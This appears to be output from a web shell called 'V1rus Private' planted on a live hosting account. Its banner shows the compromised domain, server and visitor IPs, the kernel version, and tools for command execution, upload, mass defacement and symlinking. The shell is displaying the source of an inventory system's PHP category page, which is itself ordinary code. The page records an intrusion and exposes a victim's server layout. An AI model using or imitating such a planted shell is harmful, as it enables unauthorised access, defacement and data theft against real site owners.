V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
home
/
aerosoft
/
public_html
/
InventorySystem
/
Viewing: categorie.php
<?php $page_title = 'All categories'; require_once('includes/load.php'); page_require_level(1); $current_store_id = get_current_store_id(); $all_categories = find_categories_by_store($current_store_id); ?> <?php if(isset($_POST['add_cat'])){ $req_field = array('categorie-name'); validate_fields($req_field); $cat_name = remove_junk($db->escape($_POST['categorie-name'])); $store_id = $current_store_id; if(empty($errors)){ // Check if category already exists in THIS STORE $sql = "SELECT id FROM categories WHERE name='{$cat_name}' AND store_id='{$store_id}'"; $result = $db->query($sql); if($db->num_rows($result) > 0) { $session->msg("d", "Category '{$cat_name}' already exists in this store."); redirect('categorie.php', false); } $sql = "INSERT INTO categories (name, store_id)"; $sql .= " VALUES ('{$cat_name}', '{$store_id}')"; if($db->query($sql)){ $session->msg("s", "Successfully Added New Category"); redirect('categorie.php', false); } else { $session->msg("d", "Sorry Failed to insert."); redirect('categorie.php', false); } } else { $session->msg("d", $errors); redirect('categorie.php', false); } } ?> <?php include_once('layouts/header.php'); ?> <div class="row"> <div class="col-md-12"> <?php echo display_msg($msg); ?> </div> </div> <div class="row"> <div class="col-md-5"> <div class="panel panel-default"> <div class="panel-heading"> <strong> <span class="glyphicon glyphicon-th"></span> <span>Add New Category - <?php echo get_current_store_name(); ?></span> </strong> </div> <div class="panel-body"> <form method="post" action="categorie.php"> <div class="form-group"> <input type="text" class="form-control" name="categorie-name" placeholder="Category Name" required> </div> <button type="submit" name="add_cat" class="btn btn-primary">Add Category</button> </form> </div> </div> </div> <div class="col-md-7"> <div class="panel panel-default"> <div class="panel-heading"> <strong> <span class="glyphicon glyphicon-th"></span> <span>All Categories - <?php echo get_current_store_name(); ?></span> </strong> </div> <div class="panel-body"> <table class="table table-bordered table-striped table-hover"> <thead> <tr> <th class="text-center" style="width: 50px;">#</th> <th>Categories</th> <th class="text-center" style="width: 100px;">Actions</th> </tr> </thead> <tbody> <?php foreach ($all_categories as $cat):?> <tr> <td class="text-center"><?php echo count_id();?></td> <td><?php echo remove_junk(ucfirst($cat['name'])); ?></td> <td class="text-center"> <div class="btn-group"> <a href="edit_categorie.php?id=<?php echo (int)$cat['id'];?>" class="btn btn-xs btn-warning" data-toggle="tooltip" title="Edit"> <span class="glyphicon glyphicon-edit"></span> </a> <a href="delete_categorie.php?id=<?php echo (int)$cat['id'];?>" class="btn btn-xs btn-danger" data-toggle="tooltip" title="Remove"> <span class="glyphicon glyphicon-trash"></span> </a> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> </div> </div> </div> <?php include_once('layouts/footer.php'); ?>
Coded With 💗 by
HanzOFC